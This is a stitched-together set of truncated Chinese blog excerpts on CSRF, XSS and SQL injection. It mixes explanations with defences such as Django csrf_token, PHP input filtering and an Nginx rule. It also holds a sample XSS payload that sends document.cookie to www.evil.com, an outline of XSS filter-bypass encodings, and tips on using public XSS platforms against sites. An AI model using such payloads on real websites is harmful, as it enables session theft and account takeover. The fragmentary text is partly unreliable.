跨站攻击

在近几年的 网站安全威胁排列中排前三，跨站攻击利用的是网站的用户在登陆的状 态下，在用户不知不觉的 情况下执行恶意代码以及执行网站的权限操作，CSRF窃取 不了用户的数据，只能执行用户能操 作的一些数据。比如：在用户不知道的情况下 ， 把账户里的金额，以及银行卡号，体现功能，都 转移到其他人账户里去。如果 被攻击者是一个管理员的权限，那么就会对网站安全构成严重的 危害。 CSRF跨站漏洞 由于网站设计人员，对CSRF跨站漏洞不是太了解，误认为用户从浏览器发送过来的 请求，当做 正常的用户请求，当受害者点击入侵者构造的恶意链接的时候就会执行 恶意的代码，以及恶意的 操作，例如删除用户的银行卡。Sine安全公司是一家专注 于：服务器安全、 网站安全 、网站安全 检测、网站漏洞修复,渗透测试,安全服务于 一体的网络安全服务提供商。 GET http://sinesafe.com/bank/delbank.php?id=66 当正常用户点击上面的连接的时候，并且该用户的登陆状态一直存在，用户就会不 知不觉的删除 了自己账户里的银行卡，给用户造成没必要的损失，说实话，简单的 用户身份验证以及过滤判断， 只能保证用户的请求是来自浏览器，却不能判断请求 本身是用户自己操作删除的银行卡。 CSRF网站跨站漏洞修复办法 CSRF漏洞基本都是在网站代码的框架中去修复该漏洞，我们在对网站安全进行测试

Browse 是浏览器，WebServerA 是受信任网站/被攻击网站 A，WebServerB 是恶意网站/点击网站 B。 （1） A A。 （2） A A Cookie （3） A A。 （4） A TAB B。 （5） B （6） Cookie（包括 sessionId）信息，请求网站 A。这种请求有可能更新密码，添加用户什么的操作。 from.csrf_token, 在客户端的cookie中设置csrf_token 原文：https://www.cnblogs.com/liudemeng/p/9270720.html

简介 　　跨站脚本攻击(Cross Site Scripting)，为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆，故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页之时，嵌入其中Web里面的Script代码会被执行，从而达到恶意攻击用户的特殊目的，比如获取用户的Cookie，导航到恶意网站，携带木马等。 一些场景 　　1. 恶意攻击者可以在个人介绍里面插入恶意代码，那么其他用户访问他的个人信息时，就会执行恶意代码。 　　2. 恶意攻击者可以发表一篇文章，取一个吸引眼球的标题，在内容里插入恶意代码，那么用户查看这篇文章时，就会执行恶意代码。 　　3. 恶意攻击者在一些热门文章或帖子里的回复或留言中插入恶意代码，那么用户浏览到他的回复或留言时，就会执行恶意代码。 防止XSS的两个阶段 　　1. 提交数据时，就对数据进行验证，如果含有恶意脚本，则不让数据进库，ASP.NET MVC默认是会做这个验证。如下图，如果试图插入恶意脚本，就会得到一个HttpRequestValidationException。注：图2红色框中的方法后续会提到。 　　　　　　　　　　　　　　　　　　图1 　　　　　　　　　　　　　　　　　　图2 　　 如果我们需要允许脚本入库，可以在对应的Action上加上

一、XSS与HTML标签 1. 什么地方能运行XSS ①独立的<script>标签 ②某些标签内部 第一个能执行，第二个不能 2. 常用事件 例如（若不能输入单引号可以用/代替）： 更多事件： https://www.w3school.com.cn/tags/html_ref_eventattributes.asp 3. HTML中支持事件的标签 查看事件支持的标签： https://www.runoob.com/jsref/dom-obj-event.html 4. ① JavaScript伪协议 ②data伪协议： 5. 总结：在标签内部如何执行XSS语句 大小写绕过 对于关键字替换成空的可以双写绕过 二、XSS编码 1. XSS编码总览 2. html实体编码 HTML解析器只能识别在文本里的参数或属性值里的实体编码（不能独立于标签之外） 3. 进制编码 ：十进制ascii编码、十六进制编码、unicode编码 ① 十进制编码 ② 十六进制编码 （搜索xss编码转换工具） ③ unicode编码 4. jsfuck ①jsfuck例子 ② jsfuck原理 ③ jsfuck原理 ④jsfuck一些常见取值 ⑤jsfuck转换工具 http://www.jsfuck.com 扩展 1. XSS绕过： https://www.freebuf.com/articles/web

一、AJAX基础 1. 什么是AJAX 实例： https://www.runoob.com/try/try.php?filename=tryajax_first 2. AJAX发送http请求 ① GET请求 ② POST请求 ③ 获取服务器响应 3. XMLHttpRequest的 onreadystatechange ① readystate ② status 二、XSS其他利用 1. XSS利用 XSS写配置文件getshell只有通过代码审计能发现，黑盒测试难以利用 三、XSS平台搭建和利用 1. 自己搭建XSS平台 （不建议搞站时使用自己搭建的平台，一旦被发现容易暴露） https://blog.csdn.net/itest_2016/article/details/77650356 2. XSS公用平台 （一般使用这个） https://www.xsspt.com 来源： https://www.cnblogs.com/niangaoSDS/p/11644705.html

一、JavaScript BOM 1. JS基础BOM， 什么是BOM ？ 2. Window Location 3. Window navigator 4. Windows Document对象 二、XSS原理 1. XSS漏洞原理 XSS 又叫CSS（Cross Site Script），全称 跨站脚本攻击 。指的是攻击者往Web页面或URL里插入恶意 JavaScript 脚本代码，如果Web应用程序对于用户输入的内容没有过滤，那么当正常用户浏览该网页的时候，嵌入在Web页面里的恶意 JavaScript 脚本代码会被执行，从而达到恶意攻击正常用户的目的。 2. XSS漏洞相关基础知识-浏览器工作机制 3. XSS利用方式介绍 4. XSS漏洞产生的两个条件 5. XSS危害 ①Cookie窃取 ②键盘记录 ③客户端信息探查 ④XSS getshell ⑤页面劫持 ⑥XSS蠕虫 ⑦其他危害 6. XSS漏洞分类 ① 反射型XSS（不持久） ② 存储型XSS ③ DOM型XSS DOM型XSS学习： https://blog.csdn.net/ski_12/article/details/60468362 三、XSS漏洞利用 1. XSS简单利用 2. Cookie 3. XSS漏洞利用-Cookie窃取 如果网站开了httponly，那么通过JavaScript

全称 Cross Site Scripting (避免和CSS重名，所以简称XSS) 跨站脚本攻击,指用户输入脚本并注入到了受害网站，如果该网站没有对用户输入进行过滤，那么这段脚本可能被之后访问该网站的用户浏览器执行。 例1：某个网站有评论功能且没有针对XSS 的过滤，那么小编在某文章下评论了以下内容： <script>alert("你查看了我的文章！！快打赏！！不打赏不准走！！")</script> 那么这段字符串POST给了网站服务器，没有对脚本进行过滤或者Encode，原封不动地加入了原本的HTML页面，那么当其他用户查看该文章的时候浏览器就会自动执行HTML 文档中的这句 JS 脚本 例2：如果评论里面写的是： <script>window.open(www.evil.com?content=document.cookie);</script> 当你再次访问这篇文章的时候，你在当前域下的cookie被小编的恶意网站（ www.evil.com）给get到了。。这个网站的后台程序可能会拿到你的cookie（其中包含sessionId 等等），然后借此cookie登陆你的网站账户，乱发段子。当然，目前主流的网站都是禁止JS 脚本获取并且操作cookie的，并且浏览器中的安全机制使得cookie 不会被发送到跨域的其他网站中。 利用 script 标签

最近项目部署的时候客户使用的绿盟扫描出一些漏洞，老大让我处理，经过看大神的博客等方式，分享一些简单的解决方法。 一 跨网站脚本 跨网站脚本（Cross-site scripting，通常简称为XSS或跨站脚本或跨站脚本攻击）是一种网站应用程序的安全漏洞攻击，是代码注入的一种。它允许恶意用户将代码注入到网页上，其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。 XSS攻击通常指的是通过利用网页开发时留下的漏洞，通过巧妙的方法注入恶意指令代码到网页，使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript，但实际上也可以包括Java， VBScript， ActiveX， Flash 或者甚至是普通的HTML。攻击成功后，攻击者可能得到包括但不限于更高的权限（如执行一些操作）、私密网页内容、会话和cookie等各种内容。 防止XSS攻击简单的预防就是对Request请求中的一些参数去掉一些比较敏感的脚本命令。 二 解决方案 方式一：【使用Nginx的修复方案】 server { listen 8888 default; server_name _; location / { return 403; } } 添加一个默认 server，当 host 头被修改匹配不到 server 时会跳到该默认 server，该默认 server

SQL注入 攻击，是攻击者在表单或地址栏中提交精心构造的sql语句，改动原来的sql语句，如果程序没有对提交的数据经过严格检查，那么就会造成sql注入攻击。 SQL注入因为要操作数据库，所以一般会查找SQL语句关键字：insert、delete、update、select，查看传递的变量参数是否用户可控制，有无做过安全处理。 防止SQL注入攻击的一些函数: /** +---------------------------------------------------------- * 防挂马、防跨站攻击、防sql注入函数 +---------------------------------------------------------- *$date 传入的参数，要是个变量或者数组；$ignore_magic_quotes变量的魔术引用 +---------------------------------------------------------- */ function in($data,$ignore_magic_quotes=false) { if(is_string($data)) { $data=trim(htmlspecialchars($data));//防止被挂马，跨站攻击 if(($ignore_magic_quotes==true)||(!get

-csrf:跨站请求伪造攻击 (额外还有xss,sql注入攻击) Forbidden（403）拒绝你访问 比如说自己写的一个html页面 ，它认为你是伪造出来的，不是网站下面的页面 是因为你没有做csrf的判断和验证 你看到的这条信息，因为这个网站是需要csrf的cookie，cookie为什么被需要，是因为安全的因素，被第三方黑客攻击 Django解决 在提交时候 正常的页面 <form action='/url/',method='post'> {% csrf_token%} from:<input type='text'> to :<input type='text'> 按钮 </form> 添加{% csrf_token %} 通过验证 随机的生成一个cookie 在settings -开启全局的csrf验证 1.settings 打开'django.middleware.csrf.CsrfViewMiddleware', 2.表单中开启csrf_token <form> {% csrf_token %} <input type='text'> </form> -开启局部的函数，不进行f验证 1.settings 打开'django.middleware.csrf.CsrfViewMiddleware', 2.在views.py 中： from django.views